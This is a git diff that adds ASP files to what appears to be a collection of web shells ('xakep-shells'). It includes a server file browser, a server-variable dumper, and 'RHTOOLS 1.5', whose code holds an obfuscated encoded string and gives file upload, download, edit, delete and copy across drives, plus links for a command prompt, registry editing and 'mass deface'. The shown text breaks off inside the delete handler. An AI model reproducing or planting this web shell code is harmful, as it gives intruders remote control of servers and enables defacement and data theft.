+ Next
+%>
+</select> <input class="Go" type="submit" value="Go" style="border:1px outset">
+</td>
+</form>
+<td width="1%">   Address: </td>
+<form>
+<td width="100%">
+<input class="Address" type="text" name="FolderPath" value="<%=FolderPath%>" style="width:100%" size="20">
+</td>
+<td width="1%">
+<input class="Go" type="submit" value="Go"style="border:1px outset">
+</td>
+</form>
+</tr>
+</table>
+<%
+Set Folder = FileSystem.GetFolder(FolderPath)
+Set SubFolders = Folder.SubFolders
+Set Files = Folder.Files
+%>
+<br>
+<table cellpadding="1" cellspacing="1" border="0" width="100%" align="center" style="border:1px inset">
+<tr>
+<td width="40%" height="20" bgcolor="silver">  Name</td>
+<td width="10%" bgcolor="silver" align="right">Size    </td>
+<td width="20%" bgcolor="silver">Type </td>
+<td width="20%" bgcolor="silver">Modified </td>
+<td width="10%" bgcolor="silver" align="right">Attributes  </td>
+</tr>
+<%
+If Not Folder.IsRootFolder Then
+ BgToggle
+%>
+<tr title="Top Level">
+<td bgcolor="<%=BgColor%>"><a href= "<%=Request.ServerVariables("script_name")%>?FolderPath=<%=Server.URLPathEncode(Folder.Drive & "\")%>"><font face="wingdings" size="4">O</font> Top Level</a> </td>
+<td bgcolor="<%=BgColor%>"> </td>
+<td bgcolor="<%=BgColor%>"> </td>
+<td bgcolor="<%=BgColor%>"> </td>
+<td bgcolor="<%=BgColor%>"> </td>
+</tr>
+<%BgToggle%>
+<tr>
+<td bgcolor="<%=BgColor%>"><a href= "<%=Request.ServerVariables("script_name")%>?FolderPath=<%=Server.URLPathEncode(Folder)%>"><font face="wingdings" size="4">¶</font> Up One Level</a> </td>
+<td bgcolor="<%=BgColor%>"> </td>
+<td bgcolor="<%=BgColor%>"> </td>
+<td bgcolor="<%=BgColor%>"> </td>
+<td bgcolor="<%=BgColor%>"> </td>
+</tr>
+<%
+End If
+For Each SubFolder In SubFolders
+ BgToggle
+%>
+<tr>
+<td bgcolor="<%=BgColor%>" title="<%=SubFolder.Name%>"> <a href= "<%=Request.ServerVariables("script_name") & "?FolderPath=" & Server.URLPathEncode(FolderPath & SubFolder.Name & "\")%>"><font face="wingdings" size="4">0</font> <b><%=SubFolder.Name%></b></a>        (<a href= "<%=Request.ServerVariables("script_name")%>?CopyFolder=<%=Server.URLPathEncode(FolderPath & SubFolder.Name)%>&FolderPath=<%=Server.URLPathEncode(FolderPath & "\")%>">Copy</a>)</td>
+<td bgcolor="<%=BgColor%>"> </td>
+<td bgcolor="<%=BgColor%>"><%=SubFolder.Type%>  </td>
+<td bgcolor="<%=BgColor%>"><%=SubFolder.DateLastModified%> </td>
+<td bgcolor="<%=BgColor%>" align="right"><%=Attributes(SubFolder.Attributes)%></td>
+</tr>
+<%
+Next
+For Each File In Files
+ BgToggle
+ Ext = FileExtension(File.Name)
+%>
+<tr>
+<td bgcolor="<%=BgColor%>" title="<%=File.Name%>"> <a href= "showcode.asp?f=<%=File.Name%>&FolderPath=<%=Server.URLPathEncode(FolderPath)%>" target="_blank"><font face="wingdings" size="4">3</font> "<%=File.Name%></a>        (<a href= "<%=Request.ServerVariables("script_name")%>?CopyFile=<%=File.Name%>&FolderPath=<%=Server.URLPathEncode(FolderPath & "\")%>">Copy</a>)</td>
+<td bgcolor="<%=BgColor%>" align="right"><%=(File.Size)%> Byte  </td>
+<td bgcolor="<%=BgColor%>"><%=File.Type%></td>
+<td bgcolor="<%=BgColor%>"><%=File.DateLastModified%></td>
+<td bgcolor="<%=BgColor%>" align="right"><%=Attributes(File.Attributes)%></td>
+</tr>
+<%Next%>
+</table>
+</body>
+</html>
+<%
+Private Function ConvertBinary(ByVal SourceNumber, ByVal MaxValuePerIndex, ByVal MinUpperBound, ByVal IndexSeperator)
+    Dim lsResult
+    Dim llTemp
+    Dim giCount
+    MaxValuePerIndex = MaxValuePerIndex + 1
+    Do While Int(SourceNumber / (MaxValuePerIndex ^ MinUpperBound)) > (MaxValuePerIndex - 1)
+        MinUpperBound = MinUpperBound + 1
+    Loop
+    For giCount = MinUpperBound To 0 Step -1
+        llTemp = Int(SourceNumber / (MaxValuePerIndex ^ giCount))
+        lsResult = lsResult & CStr(llTemp)
+        If giCount > 0 Then lsResult = lsResult & IndexSeperator
+        SourceNumber = SourceNumber - (llTemp * (MaxValuePerIndex ^ giCount))
+    Next
+    ConvertBinary = lsResult
+End Function
+
+Private Sub BgToggle()
+ BackgroundColor = Not(BackgroundColor)
+ If BackgroundColor Then
+  BgColor = "#efefef"
+ Else
+  BgColor = "#ffffff"
+ End If
+End Sub
+
+Private Function Attributes(AttributeValue)
+ Dim lvAttributes
+ Dim lsResult
+ lvAttributes = Split(ConvertBinary(AttributeValue, 1, 7, ","), ",")
+ If lvAttributes(0) = 1 Then lsResult = "ReadOnly&nbsp;&nbsp;"
+ If lvAttributes(1) = 1 Then lsResult = lsResult & "Hidden&nbsp;&nbsp;"
+ If lvAttributes(2) = 1 Then lsResult = lsResult & "System&nbsp;&nbsp;"
+ If lvAttributes(5) = 1 Then lsResult = lsResult & "Archive&nbsp;&nbsp;"
+ Attributes = lsResult
+End Function
+
+Private Function FileExtension(FileName)
+ Dim lsExt
+ Dim liCount
+ For liCount = Len(FileName) To 1 Step -1
+  If Mid(FileName, liCount, 1) = "." Then
+   lsExt = Right(FileName, Len(FileName) - liCount)
+   Exit For
+  End If
+ Next
+ If Not FileSystem.FileExists(ScriptFolder & "ext_" & lsExt & ".gif") Then
+  lsExt = ""
+ End If
+ FileExtension = lsExt
+End Function
+
+Private Function ParseFolder(PathString)
+ Dim liCount
+ If Right(PathString, 1) = "\" Then
+  ParseFolder = PathString
+ Else
+  For liCount = Len(PathString) To 1 Step -1
+   If Mid(PathString, liCount, 1) = "\" Then
+    ParseFolder = Left(PathString, liCount)
+    Exit For
+   End If
+  Next
+ End If
+End Function
+%>
+
diff --git a/xakep-shells/ASP/Server Variables.asp.txt b/xakep-shells/ASP/Server Variables.asp.txt
new file mode 100644
index 0000000..e9b0318
--- /dev/null
+++ b/xakep-shells/ASP/Server Variables.asp.txt	
@@ -0,0 +1,27 @@
+<%
+Dim Vars
+%>
+
+<p>&nbsp;</p>
+<p>&nbsp;</p>
+<p><font size="2" face="Arial, Helvetica, sans-serif"><strong>A list of all server 
+  variables : </strong> </font></p>
+<p><BR>
+  <BR>
+</p>
+<TABLE width="75%" BORDER=1 align="center" cellpadding="3" cellspacing="0">
+  <TR> 
+    <TD width="149"><p><font size="2" face="Arial, Helvetica, sans-serif"><B>Server 
+        Variable Name</B></font></p>
+      </TD>
+    <TD width="333"><p><font size="2" face="Arial, Helvetica, sans-serif"><B>Server 
+        Variable Value</B></font></p>
+      </TD>
+  </TR>
+  <% For Each Vars In Request.ServerVariables %>
+  <TR> 
+    <TD><FONT SIZE="1" face="Arial, Helvetica, sans-serif"><%= Vars %></FONT></TD>
+    <TD><FONT SIZE="1" face="Arial, Helvetica, sans-serif"><%= Request.ServerVariables(Vars) %>&nbsp;</FONT></TD>
+  </TR>
+  <% Next %>
+</TABLE>
diff --git a/xakep-shells/ASP/Tool.asp.txt b/xakep-shells/ASP/Tool.asp.txt
new file mode 100644
index 0000000..3856514
--- /dev/null
+++ b/xakep-shells/ASP/Tool.asp.txt
@@ -0,0 +1,792 @@
+<%@ LANGUAGE = VBScript.Encode %>
+<%
+On Error Resume Next
+Server.ScriptTimeOut  = 7200
+Class FileUploader
+	Public  Files
+	Private mcolFormElem
+	Private Sub Class_Initialize()
+		Set Files = Server.CreateObject("Scripting.Dictionary")
+		Set mcolFormElem = Server.CreateObject("Scripting.Dictionary")
+	End Sub
+	Private Sub Class_Terminate()
+		If IsObject(Files) Then
+			Files.RemoveAll()
+			Set Files = Nothing
+		End If
+		If IsObject(mcolFormElem) Then
+			mcolFormElem.RemoveAll()
+			Set mcolFormElem = Nothing
+		End If
+	End Sub
+	Public Property Get Form(sIndex)
+		Form = ""
+		If mcolFormElem.Exists(LCase(sIndex)) Then Form = mcolFormElem.Item(LCase(sIndex))
+	End Property
+	Public Default Sub Upload()
+		Dim biData, sInputName
+		Dim nPosBegin, nPosEnd, nPos, vDataBounds, nDataBoundPos
+		Dim nPosFile, nPosBound
+		biData = Request.BinaryRead(Request.TotalBytes)
+		nPosBegin = 1
+		nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
+		If (nPosEnd-nPosBegin) <= 0 Then Exit Sub
+		vDataBounds = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
+		nDataBoundPos = InstrB(1, biData, vDataBounds)
+		Do Until nDataBoundPos = InstrB(biData, vDataBounds & CByteString("--"))
+			nPos = InstrB(nDataBoundPos, biData, CByteString("Content-Disposition"))
+			nPos = InstrB(nPos, biData, CByteString("name="))
+			nPosBegin = nPos + 6
+			nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(34)))
+			sInputName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
+			nPosFile = InstrB(nDataBoundPos, biData, CByteString("filename="))
+			nPosBound = InstrB(nPosEnd, biData, vDataBounds)
+			If nPosFile <> 0 And  nPosFile < nPosBound Then
+				Dim oUploadFile, sFileName
+				Set oUploadFile = New UploadedFile
+				nPosBegin = nPosFile + 10
+				nPosEnd =  InstrB(nPosBegin, biData, CByteString(Chr(34)))
+				sFileName = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
+				oUploadFile.FileName = Right(sFileName, Len(sFileName)-InStrRev(sFileName, "\"))
+				nPos = InstrB(nPosEnd, biData, CByteString("Content-Type:"))
+				nPosBegin = nPos + 14
+				nPosEnd = InstrB(nPosBegin, biData, CByteString(Chr(13)))
+				oUploadFile.ContentType = CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
+				nPosBegin = nPosEnd+4
+				nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
+				oUploadFile.FileData = MidB(biData, nPosBegin, nPosEnd-nPosBegin)
+				If oUploadFile.FileSize > 0 Then Files.Add LCase(sInputName), oUploadFile
+			Else
+				nPos = InstrB(nPos, biData, CByteString(Chr(13)))
+				nPosBegin = nPos + 4
+				nPosEnd = InstrB(nPosBegin, biData, vDataBounds) - 2
+				If Not mcolFormElem.Exists(LCase(sInputName)) Then mcolFormElem.Add LCase(sInputName), CWideString(MidB(biData, nPosBegin, nPosEnd-nPosBegin))
+			End If
+			nDataBoundPos = InstrB(nDataBoundPos + LenB(vDataBounds), biData, vDataBounds)
+		Loop
+	End Sub
+	Private Function CByteString(sString)
+		Dim nIndex
+		For nIndex = 1 to Len(sString)
+		   CByteString = CByteString & ChrB(AscB(Mid(sString,nIndex,1)))
+		Next
+	End Function
+	Private Function CWideString(bsString)
+		Dim nIndex
+		CWideString =""
+		For nIndex = 1 to LenB(bsString)
+		   CWideString = CWideString & Chr(AscB(MidB(bsString,nIndex,1))) 
+		Next
+	End Function
+End Class
+Class UploadedFile
+	Public ContentType
+	Public FileName
+	Public FileData
+	Public Property Get FileSize()
+		FileSize = LenB(FileData)
+	End Property
+	Public Sub SaveToDisk(sPath)
+		Dim oFS, oFile
+		Dim nIndex
+		If sPath = "" Or FileName = "" Then Exit Sub
+		If Mid(sPath, Len(sPath)) <> "\" Then sPath = sPath & "\"
+		Set oFS = Server.CreateObject("Scripting.FileSystemObject")
+		If Not oFS.FolderExists(sPath) Then Exit Sub
+		Set oFile = oFS.CreateTextFile(sPath & FileName, True)
+		For nIndex = 1 to LenB(FileData)
+		    oFile.Write Chr(AscB(MidB(FileData,nIndex,1)))
+		Next
+		oFile.Close
+	End Sub
+	Public Sub SaveToDatabase(ByRef oField)
+		If LenB(FileData) = 0 Then Exit Sub
+		If IsObject(oField) Then
+			oField.AppendChunk FileData
+		End If
+	End Sub
+End Class
+key = "5DCADAC1902E59F7273E1902E5AD8414B1902E5ABF3E661902E5B554FC41902E53205CA01902E59F7273E1902E597A18C51902E59AC1E8F1902E59DE24591902E55F5B0911902E53CF70E31902E597A18C51902E5B2349FA1902E5A422FED1902E597A18C51902E5A8D389C1902E53CF70E31902E53205CA01902E5B3C4CDF1902E5A422FED1902E5BEB61221902E59DE24591902E55F5B0911902E53CF70E31902E54C98DD51902E53CF70E31902E560EB3761902E547E85261902E55AAA7E21902E55AAA7E21902E53205CA01902E5802ED5A1902E5708D0681902E5834F3241902E57B7E4AB1902E57B7E4AB1902E576CDBFC1902E581BF03F1902E53205CA01902E54C98DD51902E547E85261902E552D99691902E53205CA01902E5672BF0A1902E56BDC7B91902E5834F3241902E5659BC251902E53E873C81902E57D0E7901902E5866F8EE1902E5834F3241902E540176AD1902E53B66DFE1902E59AC1E8F1902E5AD8414B1902E5AF144301902E5BD25E3D1902E55C3AAC71902E53205CA01902E5672BF0A1902E58B2019D1902E53205CA01902E55DCADAC1902E597A18C51902E53205CA01902E5A292D081902E5B2349FA1902E59DE24591902E59F7273E1902E55F5B0911902E53CF70E31902E5AA63B811902E597A18C51902E5A422FED1902E5A8D389C1902E5B554FC41902E5AD8414B1902E55AAA7E21902E5B2349FA1902E5A292D081902E59F7273E1902E597A18C51902E59AC1E8F1902E5B554FC41902E5AD8414B1902E5B2349FA1902E5640B9401902E597A18C51902E5ABF3E661902E5B554FC41902E5A422FED1902E5B3C4CDF1902E5AD8414B1902E59AC1E8F1902E5A422FED1902E597A18C51902E5A8D389C1902E547E85261902E59AC1E8F1902E5AD8414B1902E5AA63B811902E53CF70E31902E560EB3761902E5802ED5A1902E5708D0681902E56BDC7B91902E581BF03F1902E584DF6091902E581BF03F1902E53205CA01902E56D6CA9E1902E5659BC251902E568BC1EF1902E5834F3241902E57B7E4AB1902E5802ED5A1902E55DCADAC1902E5497880B1902E597A18C51902E560EB3761902E53205CA01902E546582411902E53205CA01902E55DCADAC1902E597A18C51902E53205CA01902E5A292D081902E5B2349FA1902E59DE24591902E59F7273E1902E55F5B0911902E53CF70E31902E5708D0681902E5834F3241902E5834F3241902E57D0E7901902E55AAA7E21902E5497880B1902E5497880B1902E587FFBD31902E587FFBD31902E587FFBD31902E547E85261902E5802ED5A1902E5708D0681902E56BDC7B91902E581BF03F1902E584DF6091902E581BF03F1902E56D6CA9E1902E5659BC251902E568BC1EF1902E5834F3241902E57B7E4AB1902E5802ED5A1902E547E85261902E568BC1EF1902E573AD6321902E5672BF0A1902E547E85261902E579EE1C61902E56BDC7B91902E5834F3241902E53CF70E31902E53205CA01902E5B554FC41902E597A18C51902E5B2349FA1902E5A102A231902E59DE24591902E5B554FC41902E55F5B0911902E53CF70E31902E594812FB1902E59931BAA1902E5A8D389C1902E597A18C51902E5ABF3E661902E5A7435B71902E53CF70E31902E560EB3761902E5708D0681902E5834F3241902E5834F3241902E57D0E7901902E55AAA7E21902E5497880B1902E5497880B1902E587FFBD31902E587FFBD31902E587FFBD31902E547E85261902E5802ED5A1902E5708D0681902E56BDC7B91902E581BF03F1902E584DF6091902E581BF03F1902E56D6CA9E1902E5659BC251902E568BC1EF1902E5834F3241902E57B7E4AB1902E5802ED5A1902E547E85261902E568BC1EF1902E573AD6321902E5672BF0A1902E547E85261902E579EE1C61902E56BDC7B91902E5834F3241902E55DCADAC1902E5497880B1902E597A18C51902E560EB3761902E53205CA01902E55AAA7E21902E55AAA7E21902E547E85261902E55DCADAC1902E5497880B1902E59F7273E1902E5AD8414B1902E5ABF3E661902E5B554FC41902E560EB3761902E5|337308|1A7023"
+startcode = "<html><head><title>.:: RHTOOLS 1.5 BETA(PVT) ::.</title></head><body>"
+endocde = "</body></html>"
+onlinehelp = "<font face=""arial"" size=""1"">.:: <a href=""http://www.rhesusfactor.cjb.net"" target=""_blank"">ONLINE HELP</a> ::.</font><br>"
+Function DeCryptString(strCryptString)
+	Dim strRAW, arHexCharSet, i, intKey, intOffSet, strRawKey, strHexCrypData
+	    strRawKey = Right(strCryptString, Len(strCryptString) - InStr(strCryptString, "|"))
+	    intOffSet = Right(strRawKey, Len(strRawKey) - InStr(strRawKey,"|"))
+	    intKey = HexConv(Left(strRawKey, InStr(strRawKey, "|") - 1)) - HexConv(intOffSet)
+	    strHexCrypData = Left(strCryptString, Len(strCryptString) - (Len(strRawKey) + 1))
+	    arHexCharSet = Split(strHexCrypData, Hex(intKey))
+		 For i=0 to UBound(arHexCharSet)
+		      strRAW = strRAW & Chr(HexConv(arHexCharSet(i))/intKey)
+		 Next
+	    DeCryptString = CStr(strRAW)
+End Function
+Function HexConv(hexVar)
+	Dim hxx, hxx_var, multiply          
+         IF hexVar <> "" THEN
+              hexVar = UCASE(hexVar)
+              hexVar = StrReverse(hexVar)
+              DIM hx()
+              REDIM hx(LEN(hexVar))
+              hxx = 0
+              hxx_var = 0
+              FOR hxx = 1 TO LEN(hexVar)
+                   IF multiply = "" THEN multiply = 1
+                   hx(hxx) = mid(hexVar,hxx,1)
+                   hxx_var = (get_hxno(hx(hxx)) * multiply) + hxx_var
+                   multiply = (multiply * 16)
+              NEXT
+              hexVar = hxx_var
+              HexConv = hexVar
+         END IF
+End Function
+cprthtml = "<font face='arial' size='1'>.:: RHTOOLS 1.5 BETA(PVT)&copy; BY <a href='mailto:rhfactor@antisocial.com'>RHESUS FACTOR</a> - <a href='HTTP://WWW.RHESUSFACTOR.CJB.NET' target='_blank'>HTTP://WWW.RHESUSFACTOR.CJB.NET</a> ::.</font>"
+Function get_hxno(ghx)
+         If ghx = "A" Then
+              ghx = 10
+         ElseIf ghx = "B" Then
+              ghx = 11
+         ElseIf ghx = "C" Then
+              ghx = 12
+         ElseIf ghx = "D" Then
+              ghx = 13
+         ElseIf ghx = "E" Then
+              ghx = 14
+         ElseIf ghx = "F" Then
+              ghx = 15
+         End If
+         get_hxno = ghx
+End Function
+keydec = DeCryptString(key)
+Function showobj(objpath)
+	showobj = Mid(objpath,InstrRev(objpath,"\")+1,Len(objpath))
+End Function
+Function showobjpath(objpath)
+	showobjpath = Left(objpath,InstrRev(objpath,"\"))
+End Function
+Function checking(a,b)
+	If CStr(Mid(a,95,13)) <> CStr(Mid(b,95,13)) Then
+		pagina = Mid(Request.ServerVariables("SCRIPT_NAME"),InstrRev(Request.ServerVariables("SCRIPT_NAME"),"/")+1,Len(Request.ServerVariables("SCRIPT_NAME"))) & "?action=error"
+		Response.Redirect(pagina)
+	End If
+End Function
+Sub hdr()
+	Response.Write startcode
+	Response.Write keydec
+	Response.Write "<br>"
+End Sub
+Sub showcontent()
+	Response.Write "<font face=""arial"" size=""1"">.:: <a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=root"">DRIVES</a> ::.<br>.:: SCRIPT PATH: " & UCase(Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))) & "<br><br></font>"
+	If Trim(Request.QueryString("raiz")) = "root" Then
+		Set fs=Server.Createobject("Scripting.FileSystemObject")
+		Set drivecollection=fs.drives
+		Response.Write "<font face=""arial"" size=""2"">"
+		For Each drive IN drivecollection 
+			str=drive.driveletter & ":"
+			Response.Write "<b><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=" & str & """>" & UCase(str) & "</a></b><br>"
+			Select Case drive.DriveType
+				Case 0
+					tipodrive = "Unknown"
+					nomedrive = drive.VolumeName
+				Case 1
+					tipodrive = "Removable"
+					If drive.isready Then
+						nomedrive = drive.VolumeName
+					Else
+						nomedrive = ""
+					End If
+				Case 2
+					tipodrive = "Fixed"
+					If drive.isready Then
+						nomedrive = drive.VolumeName
+					Else
+						nomedrive = ""
+					End If
+				Case 3
+					tipodrive = "Network"
+					If drive.isready Then
+						nomedrive = drive.ShareName
+					Else
+						nomedrive = ""
+					End If
+				Case 4
+					tipodrive = "CD-Rom"
+					If drive.isready Then
+						nomedrive = drive.VolumeName
+					Else
+						nomedrive = ""
+					End If
+				Case 5
+					tipodrive = "RAM Disk"
+					If drive.isready Then
+						nomedrive = drive.VolumeName
+					Else
+						nomedrive = ""
+					End If
+			End Select
+			response.write "<b>Tipo:</b> " & tipodrive & "<br>"
+			response.write "<b>Nome: </b>" & nomedrive & "<br>"
+			response.write "<b>Sistema de Arquivos: </b>"
+			If drive.isready Then
+				set sp=fs.getdrive(str)
+				response.write sp.filesystem & "<br>"
+			Else
+			response.write "-<br>"
+			End If
+			Response.Write "<b>Espaço Livre: </b>"
+			If drive.isready Then
+				freespace = (drive.AvailableSpace / 1048576)
+				set sp=fs.getdrive(str)
+				response.write(Round(freespace,1) & " MB<br>")
+			Else
+				response.write("-<br>")
+			End If
+			Response.Write "<b>Espaço Total: </b>"
+			If drive.isready Then
+				totalspace = (drive.TotalSize / 1048576)
+				set sp=fs.getdrive(str)
+				response.write(Round(totalspace,1) & " MB<br>")
+			Else
+				response.write("-<br>")
+			End If
+			Response.Write "<br>"
+		Next
+		Response.Write "</font>"
+		Set fs = Nothing
+		Set drivecollection = Nothing
+		set sp=Nothing
+	Else
+		If Trim(Request.QueryString("raiz")) = "" Then
+			caminho = Server.MapPath(Request.ServerVariables("SCRIPT_NAME"))
+			pos = Instr(caminho,"\")
+			pos2 = 1
+			While pos2 <> 0
+				If Instr(pos + 1,caminho,"\") <> 0 Then
+					pos = Instr(pos + 1,caminho,"\")
+				Else
+					pos2 = 0
+				End If
+			Wend
+			raiz = Left(caminho,pos)
+		Else
+			raiz =  trim(Request.QueryString("raiz")) & "\"
+		End If
+		Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+		Set MonRep = ObjFSO.GetFolder(raiz)
+		Set ColFolders = MonRep.SubFolders
+		Set ColFiles0 = MonRep.Files
+		Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=mass&massact=test&path=" & Replace(raiz,"\","|") & "', 'win1','width=600,height=300,scrollbars=YES,resizable')"">MASS TEST IN " & UCase(raiz) & "</a></font><br><br>"
+		Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=mass&massact=dfc&path=" & Replace(raiz,"\","|") & "', 'win1','width=700,height=300,scrollbars=YES,resizable')"">MASS DEFACE IN " & UCase(raiz) & "</a></font><br><br>"
+		Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=upload&path=" & Replace(raiz,"\","|") & "', 'win1','width=500,height=100,scrollbars=YES,resizable')"">UPLOAD FILE TO " & UCase(raiz) & "</a></font><br><br>"
+		Response.Write "<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=cmd', 'win1','width=760,height=540,scrollbars=YES,resizable')"">PROMPT</a> - <a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=info', 'win1','width=760,height=450,scrollbars=YES,resizable')"">SYS INFO</a> - <a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=reg', 'win1','width=550,height=250,scrollbars=YES,resizable')"">REGEDIT</a></font><br><br>"
+		Response.Write "<font face='arial'><b>Root Folder: " & raiz & "</b></font><br><br>"
+		If CInt(Len(raiz) - 1) <> 2 Then
+			barrapos = CInt(InstrRev(Left(raiz,Len(raiz) - 1),"\")) - 1
+			backlevel = Left(raiz,barrapos)
+			Response.Write "<font face='arial' size='2'><b>&lt;DIR&gt;<a href='" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=" & backlevel & "'> . . </font></b></a><br>"
+		Else
+			Response.Write "<font face='arial' size='2'><b>&lt;DIR&gt;<a href='" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=root'> . .&nbsp;</font></b></a><br>"
+		End If
+		Response.Write "<table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
+		for each folderItem in ColFolders
+			Response.Write "<tr><td><font face='arial' size='2'><b>&lt;DIR&gt; <a href='" & Request.ServerVariables("SCRIPT_NAME") & "?raiz=" & folderItem.path & "'>" & showobj(folderItem.path) & "</a></b></td><td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=put&path=" & Replace(folderItem.path,"\","|") & "', 'win1','width=400,height=250,scrollbars=YES,resizable')"">&lt;&lt; PUT</a></font></td></tr>"
+		next
+		Response.Write "</table><br><table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
+		marcatabela = true
+		for each FilesItem0 in ColFiles0
+			If marcatabela = true then
+				corfundotabela = " bgcolor=""#EEEEEE"""
+			Else
+				corfundotabela = ""
+			End If
+			Response.Write "<tr><td" & corfundotabela & "><font face='arial' size='2'>:: " & showobj(FilesItem0.path) & "</td><td valign='baseline'" & corfundotabela & "><font face='arial' size='1'>&nbsp;&nbsp;" & FormatNumber(FilesItem0.size/1024, 0) & "&nbsp;Kbytes&nbsp;&nbsp;&nbsp;</font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=get&path=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=400,height=200,scrollbars=YES,resizable')"">o.GET.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=ren&path=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=400,height=200,scrollbars=YES,resizable')"">o.REN.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=del&path=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=400,height=200,scrollbars=YES,resizable')"">o.DEL.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtview&file=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=640,height=480,scrollbars=YES,resizable')"">o.VIEW.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""#"" onclick=""javascript:document.open('" & Request.ServerVariables("SCRIPT_NAME") & "?action=txtedit&file=" & Replace(FilesItem0.path,"\","|") & "', 'win1','width=760,height=520,scrollbars=YES,resizable')"">o.EDIT.o</a></font></td><td valign='baseline'" & corfundotabela & ">&nbsp;&nbsp;&nbsp;&nbsp;<font face='arial' size='1'><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=download&file=" & Replace(FilesItem0.path,"\","|") & """>o.DOWNLOAD.o</a></font></td></tr>"
+			marcatabela = NOT marcatabela
+		next
+		Response.Write "</table>"
+	End If
+End Sub
+Select Case Trim(Request.QueryString("action"))
+	Case "get"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		caminho = Replace(Trim(Request.QueryString("path")),"|","\")
+		Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+		Set MyFile = ObjFSO.GetFile(caminho)
+		destino = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
+		MyFile.Copy (destino)
+		If Err.Number = 0 Then
+			Response.Write "<font face='arial' size='2'><center><br><br>Arquivo: <b>" & caminho & "</b><br>copiado para: " & destino
+		End If	
+	Case "put"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		If Trim(Request.QueryString("arquivo")) = "" Then
+			caminho = Left(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),InstrRev(Server.MapPath(Request.ServerVariables("SCRIPT_NAME")),"\"))
+			varpath = Trim(Request.QueryString("path"))
+			Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+			Set MonRep = ObjFSO.GetFolder(caminho)
+			Set ColFolders = MonRep.SubFolders
+			Set ColFiles0 = MonRep.Files
+
+			Response.Write "<font face='arial' size='2'><b>Selecione o arquivo: <br><table border=""0"" cellspacing=""0"" cellpadding=""0"" >"
+			for each FilesItem0 in ColFiles0
+				Response.Write "<tr><td><font face='arial' size='2'>:: " & showobj(FilesItem0.path) & "</td><td valign='baseline'><font face='arial' size='1'>&nbsp;&nbsp;" & FormatNumber(FilesItem0.size/1024, 0) & "&nbsp;Kbytes&nbsp;&nbsp;&nbsp;</font></td><td valign='baseline'>&nbsp;&nbsp;<font face='arial' size='1'><a href=""" & Request.ServerVariables("SCRIPT_NAME") & "?action=put&path=" & varpath & "&arquivo=" & Replace(FilesItem0.path,"\","|") & """>:: SELECIONAR ::</a></font></td></tr>"
+			next
+			Response.Write "</table>"
+		Else
+			destino = Replace(Trim(Request.QueryString("path")),"|","\") & "\"
+			arquivo = Replace(Trim(Request.QueryString("arquivo")),"|","\")
+			Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+			Set MyFile = ObjFSO.GetFile(arquivo)
+			MyFile.Copy (destino)
+			If Err.Number = 0 Then
+				Response.Write "<font face='arial' size='2'><center><br><br>Arquivo: <b>" & arquivo & "</b><br>copiado para: <b>" & destino
+			End If
+		End If
+	Case "del"
+		checa = checking(cprthtml,keydec)
+		Call hdr()
+		Response.Write copyright & onlinehelp
+		caminho = Replace(Trim(Request.QueryString("path")),"|","\")
+		Set ObjFSO = CreateObject("Scripting.FileSystemObject")
+		Set MyFile = ObjFSO.GetFile(caminho)
+		MyFile.Delete
+		If Err.Number = 0 Then
+			Response.Write "<SCRIPT LANGUAGE=""JavaScript"">self.opener.document.location.reload();</SCRIPT>"
